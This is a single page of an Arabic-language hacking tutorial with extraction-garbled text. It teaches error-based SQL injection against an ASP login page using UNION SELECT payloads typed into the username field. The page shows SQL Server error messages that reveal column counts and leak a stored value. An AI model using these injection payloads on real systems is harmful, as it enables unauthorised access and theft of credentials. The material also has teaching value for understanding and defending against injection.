Page 237 - بسم الله الرحمن الرحيم

P. 237

‫نفسك‬
‫وهو المر الذي لن يضع شكوك حول وجهود لشخص مشبوه‬
‫سنكمل ما بدأناه ولكن بإضافة عمود أختر له السم ‪ id‬وهو رقم تصسلسلي لكل مستخد‪.‬م ) تصذكر أنه رقم(‬

‫إذن لدينا جهدول أسمه ‪user‬‬
‫يحوي العمده التاليه‬
‫‪ id‬وهو رقم صحيح‬

‫‪ username‬وهو قيمة نصيه ) القيم النصيه يمكن أن تصحوي أرقا‪.‬م( مثال ‪admin1‬‬
‫‪ passwd‬وهي أيضا قيمه نصيه‬

‫نجرب عمل ‪ union‬لقيمه نصيه وتصحويلها إلى قيمة عدديه ) لن يتم التحويل ولكنه سيخرج رساله ختطأ‬
‫ثمينه جهدا(‬

‫ندختل اسم المستخد‪.‬م ‪blah' union SELECT username FROM user :‬‬
‫و سنحصل على رسالة ختطأ ل تصفيدنا في شيء‬
‫رسالة الخطأ هي‬

‫اقتباس‪:‬‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
‫‪''80040e14‬‬

‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]All‬‬
‫‪queries in an SQL statement containing a UNION operator‬‬
‫‪must have an equal number of expressions in their target‬‬

‫‪.lists‬‬
‫‪admin/admin.asp, line 13/‬‬

‫نقو‪.‬م بزيادة ‪ id‬مره واحد فتصبح بالشكل التالي‬
‫‪blah' union SELECT username,username FROM user‬‬

‫فنحصل على نفس رسالة الخطأ‬
‫نتابع الزياده إلى أن نحصل على رسالة ختطأ مختلفه‬
‫لنفترض أننا حصلنا على رسالة الخطأ الجديده عند أدختال اسم المستخد‪.‬م التالي‬
‫‪blah' union SELECT username,username,usernam‬‬
‫‪e,username,username FROM user‬‬

‫فنحصل على رسالة الخطأ التاليه‬

‫اقتباس‪:‬‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
‫‪''80040e07‬‬

‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Syntax‬‬
‫‪error converting the‬‬

‫‪.varchar value 'Lame_Admin' to a column of data type int‬‬
‫‪admin/admin.asp, line 13/‬‬

‫‪237‬‬

232 233 234 235 236 237 238 239 240 241 242